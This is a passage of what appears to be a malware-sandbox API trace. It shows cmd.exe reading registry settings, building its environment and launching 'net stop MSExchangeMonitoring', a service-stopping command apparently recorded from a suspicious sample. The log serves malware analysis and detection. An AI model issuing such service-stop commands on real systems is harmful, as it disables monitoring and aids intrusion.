AllocationBase=0x4590000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0138.236] VirtualQuery (in: lpAddress=0x4593000, lpBuffer=0x468f738, dwLength=0x1c | out: lpBuffer=0x468f738*(BaseAddress=0x4593000, AllocationBase=0x4590000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.236] VirtualQuery (in: lpAddress=0x4690000, lpBuffer=0x468f738, dwLength=0x1c | out: lpBuffer=0x468f738*(BaseAddress=0x4690000, AllocationBase=0x4690000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0138.236] GetConsoleOutputCP () returned 0x1b5 [0138.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.236] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0138.236] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.236] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0138.236] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.236] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.236] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.236] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.237] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.237] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.237] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.237] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0138.237] GetEnvironmentStringsW () returned 0x49b7d78* [0138.237] FreeEnvironmentStringsA (penv="A") returned 1 [0138.237] GetEnvironmentStringsW () returned 0x49b7d78* [0138.237] FreeEnvironmentStringsA (penv="A") returned 1 [0138.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x468e6e4 | out: phkResult=0x468e6e4*=0x94) returned 0x0 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0xc8, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x1, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0x1, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x0, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x40, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x40, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.237] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0x40, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.238] RegCloseKey (hKey=0x94) returned 0x0 [0138.238] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x468e6e4 | out: phkResult=0x468e6e4*=0x94) returned 0x0 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0x40, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x1, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0x1, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x0, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x9, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x4, lpData=0x468e6f0*=0x9, lpcbData=0x468e6ec*=0x4) returned 0x0 [0138.238] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x468e6e8, lpData=0x468e6f0, lpcbData=0x468e6ec*=0x1000 | out: lpType=0x468e6e8*=0x0, lpData=0x468e6f0*=0x9, lpcbData=0x468e6ec*=0x1000) returned 0x2 [0138.238] RegCloseKey (hKey=0x94) returned 0x0 [0138.238] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983b [0138.238] srand (_Seed=0x5ad2983b) [0138.238] GetCommandLineW () returned="/c net stop MSExchangeMonitoring" [0138.238] GetCommandLineW () returned="/c net stop MSExchangeMonitoring" [0138.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.238] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x49b9cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0138.238] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.238] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.238] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.238] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0138.238] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0138.238] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0138.238] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0138.238] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0138.238] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0138.238] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0138.238] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0138.238] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0138.239] GetEnvironmentStringsW () returned 0x49b7d78* [0138.239] FreeEnvironmentStringsA (penv="A") returned 1 [0138.239] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.239] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.239] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0138.239] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0138.239] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0138.239] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0138.239] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0138.239] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0138.239] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0138.239] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0138.239] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x468f4bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.239] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x468f4bc, lpFilePart=0x468f4b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x468f4b4*="Desktop") returned 0x1d [0138.239] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.239] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x468f238 | out: lpFindFileData=0x468f238) returned 0x49b05c8 [0138.239] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0138.239] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x468f238 | out: lpFindFileData=0x468f238) returned 0x49b05c8 [0138.239] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0138.239] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0138.240] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x468f238 | out: lpFindFileData=0x468f238) returned 0x49b05c8 [0138.240] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0138.240] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.240] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0138.240] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0138.240] GetEnvironmentStringsW () returned 0x49b7d78* [0138.240] FreeEnvironmentStringsA (penv="=") returned 1 [0138.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.240] GetConsoleOutputCP () returned 0x1b5 [0138.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.241] GetUserDefaultLCID () returned 0x409 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x468f5ec, cchData=128 | out: lpLCData="0") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x468f5ec, cchData=128 | out: lpLCData="0") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x468f5ec, cchData=128 | out: lpLCData="1") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0138.241] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0138.241] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0138.242] GetConsoleTitleW (in: lpConsoleTitle=0x49ba9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.242] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0138.242] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0138.242] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0138.243] _wcsicmp (_String1="net", _String2=")") returned 69 [0138.243] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0138.243] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0138.243] _wcsicmp (_String1="IF", _String2="net") returned -5 [0138.243] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0138.243] _wcsicmp (_String1="REM", _String2="net") returned 4 [0138.243] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0138.243] GetConsoleTitleW (in: lpConsoleTitle=0x468f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.244] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.244] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.244] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.244] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.244] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.244] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.244] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.244] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.244] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.244] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.244] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.244] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.244] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.244] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.244] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.244] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.244] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.244] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.244] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.244] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.244] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.244] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.244] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.244] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.244] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.244] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.244] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.244] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.244] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.244] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.244] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.244] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.244] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.244] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.244] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.244] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.244] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.244] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.244] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.244] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.245] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.245] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.245] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.245] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.245] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.245] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.245] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.245] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.245] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.245] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.245] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.245] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.245] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.245] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.245] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.245] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.245] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.245] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.245] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.245] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.245] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.245] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.245] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.245] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.245] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.245] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.245] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.245] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.245] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.245] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.245] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.245] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.245] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.245] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.245] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0138.245] _wcsicmp (_String1="net", _String2="IF") returned 5 [0138.245] _wcsicmp (_String1="net", _String2="REM") returned -4 [0138.245] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0138.246] SetErrorMode (uMode=0x0) returned 0x0 [0138.246] SetErrorMode (uMode=0x1) returned 0x0 [0138.246] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49b05d0, lpFilePart=0x468ede4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x468ede4*="Desktop") returned 0x1d [0138.246] SetErrorMode (uMode=0x0) returned 0x1 [0138.246] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.246] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.253] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.253] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.253] GetConsoleTitleW (in: lpConsoleTitle=0x468f064, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.253] InitializeProcThreadAttributeList (in: lpAttributeList=0x468ef90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x468ef74 | out: lpAttributeList=0x468ef90, lpSize=0x468ef74) returned 1 [0138.253] UpdateProcThreadAttribute (in: lpAttributeList=0x468ef90, dwFlags=0x0, Attribute=0x60001, lpValue=0x468ef7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x468ef90, lpPreviousValue=0x0) returned 1 [0138.254] GetStartupInfoW (in: lpStartupInfo=0x468efc8 | out: lpStartupInfo=0x468efc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.254] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.254] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0138.255] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMonitoring", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x468ef18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMonitoring", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x468ef64 | out: lpCommandLine="net stop MSExchangeMonitoring", lpProcessInformation=0x468ef64*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf9c, dwThreadId=0xfd0)) returned 1 [0138.261] CloseHandle (hObject=0xa4) returned 1 [0138.261] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.262] GetEnvironmentStringsW () returned 0x49b9ee0* [0138.262] FreeEnvironmentStringsA (penv="=") returned 1 [0138.262] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0138.436] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x468eefc | out: lpExitCode=0x468eefc*=0x2) returned 1 [0138.436] CloseHandle (hObject=0xa8) returned 1 [0138.436] _vsnwprintf (in: _Buffer=0x468efe4, 